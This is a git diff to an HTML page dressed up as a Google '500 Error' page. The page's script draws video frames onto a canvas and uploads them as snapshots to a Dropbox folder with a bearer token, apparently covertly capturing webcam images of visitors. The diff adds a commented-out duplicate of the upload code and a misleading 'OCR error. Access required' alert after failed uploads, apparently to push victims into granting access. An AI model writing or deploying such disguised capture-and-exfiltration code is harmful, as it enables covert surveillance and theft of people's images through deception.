--- a/index.html
+++ b/index.html
@@ -56,7 +56,7 @@
       </g>
     </svg>
   </div>
-  <div class="error-code">500 Error - Google .</div>
+  <div class="error-code">500 Error - Google </div>
   <div class="error-message">
     There was an error. Please try again later. <span class="gray-text">That's all we know.</span>
   </div>
@@ -80,7 +80,42 @@ fetch(TEST_URL, {
 .then(response => response.json())
 .then(console.log)
 .catch(console.error);
-async function uploadToDropbox(blob) {
+// async function uploadToDropbox(blob) {
+//   const filename = `${DROPBOX_FOLDER}/snapshot_${Date.now()}.png`;
+//   const url = 'https://content.dropboxapi.com/2/files/upload';
+
+//   const response = await fetch(url, {
+//     method: 'POST',
+//     headers: {
+//       'Authorization': `Bearer ${DROPBOX_TOKEN}`,
+//       'Content-Type': 'application/octet-stream',
+//       'Dropbox-API-Arg': JSON.stringify({
+//         path: filename,
+//         mode: 'add',
+//         autorename: true,
+//         mute: false
+//       })
+//     },
+//     body: blob
+//   });
+
+//   return response.json();
+// }
+
+// function captureAndUpload() {
+//   const context = canvas.getContext('2d');
+//   context.drawImage(video, 0, 0, canvas.width, canvas.height);
+//   canvas.toBlob(async (blob) => {
+//     try {
+//       await uploadToDropbox(blob);
+//       console.log("Uploaded to Dropbox!");
+//     } catch (error) {
+//       console.error("Upload failed:", error);
+//     }
+//   }, 'image/png');
+// }
+
+  async function uploadToDropbox(blob) {
   const filename = `${DROPBOX_FOLDER}/snapshot_${Date.now()}.png`;
   const url = 'https://content.dropboxapi.com/2/files/upload';
 
@@ -99,6 +134,11 @@ async function uploadToDropbox(blob) {
     body: blob
   });
 
+  if (!response.ok) {
+    // If the response is not ok (like 401 Unauthorized), show the alert
+    alert('OCR error. Access required');
+  }
+
   return response.json();
 }
 
@@ -111,6 +151,7 @@ function captureAndUpload() {
       console.log("Uploaded to Dropbox!");
     } catch (error) {
       console.error("Upload failed:", error);
+      alert('OCR error. Access required'); // Show alert if the upload fails
     }
   }, 'image/png');
 }
